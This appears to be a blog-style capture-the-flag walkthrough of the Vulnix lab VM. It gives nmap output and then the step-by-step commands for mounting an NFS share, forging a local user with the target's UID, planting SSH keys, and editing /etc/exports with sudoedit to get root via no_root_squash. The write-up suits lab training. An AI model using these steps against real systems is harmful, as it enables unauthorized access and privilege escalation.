Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. To Grab a Copy Download Here HackLAB: Vulnix
We always Kick Off with Nmap Scan…….
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu Jul 15 10:56:44 2021 as: nmap -sC -sV -oA nmap 172.16.139.216
Nmap scan report for 172.16.139.216
Host is up (0.0015s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL UIDL PIPELINING STLS CAPA RESP-CODES TOP
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 37916/udp6 mountd
| 100005 1,2,3 38356/tcp mountd
| 100005 1,2,3 41805/tcp6 mountd
| 100005 1,2,3 57305/udp mountd
| 100021 1,3,4 37121/udp nlockmgr
| 100021 1,3,4 40483/udp6 nlockmgr
| 100021 1,3,4 44054/tcp6 nlockmgr
| 100021 1,3,4 60768/tcp nlockmgr
| 100024 1 39121/udp6 status
| 100024 1 39196/tcp6 status
| 100024 1 48005/udp status
| 100024 1 48763/tcp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: more have LOGINDISABLEDA0001 post-login LITERAL+ capabilities STARTTLS LOGIN-REFERRALS listed ID IDLE IMAP4rev1 Pre-login OK ENABLE SASL-IR
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 3h00m00s, deviation: 0s, median: 3h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 15 10:57:04 2021 -- 1 IP address (1 host up) scanned in 20.52 seconds
So many ports damn and between the box was rated hard i don’t why maybe it because of the many ports seriouly to much talking let start our enumeration. So we are having 11 ports on the target the only port that quickly caught my eyes is 2049 which is the NFS port.
NFS port 2049 is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. Now exploit it it should be easy.
NFS SHARE ON PORT 2049 EXPLOIT
showmount -e 172.16.139.216
Now we know we have a share to mount /home/vulnix * now let create a folder in our tmp directory.
mkdir /tmp/vulnix
Now let mount it into the folder we created in tmp .
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/home/vulnix /tmp/vulnix
Note:- You can only mount if you are root.
df -k
Mounted on the share folder but when i try to access i got Permission denied even when using root but since we know the username is vulnix i try creating a fake user on my attacking machine.
FAKE USER WITH THE SAME UID
We know user vulnix UID is 2008 so it should be easy let hit it.
useradd vulnix
usermod -u 2008 vulnix
su vulnix
Now we have access but seriouly i got nothing not even a SSH private key hahahhahaha why but it cool since we are user vulnix let try creating an SSH folder and adding our authorized_keys which is the id_rsa public key .
Now back to our attacking machine to generate the key.
ssh-keygen -t rsa
If you follow the process on how to generate the SSH private key and public key just change directory to ~/.ssh .
Now back to our target.
Now back to our Attacking machine let use the private key to SSH with user vulnix .
chmod 600 id_rsa
ssh -i id_rsa vulnix@172.16.139.216
We are in checking sudo -l .
Seems we can use sudoedit to modify /etc/exports .
sudoedit /etc/exports
Interesting since we can read and write to /home/vulnix i think it possible to edit it to the root user folder to add our authorized_keys so we can SSH using root let give it a try.
Now we change /home/vulnix *(rw,root_squash) to /root *(rw,no_root_squash) now let go ahead to confirm it.
Boom now let mount the NFS share.
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/root /tmp/root
Mounted now let change directory to /tmp/root .
We have the root flag but nah i wnt to get access to SSH with root now let add our authorized_keys again.
Now let try to SSH using root with the private key.
We are done and dusted.
Greeting From Muzec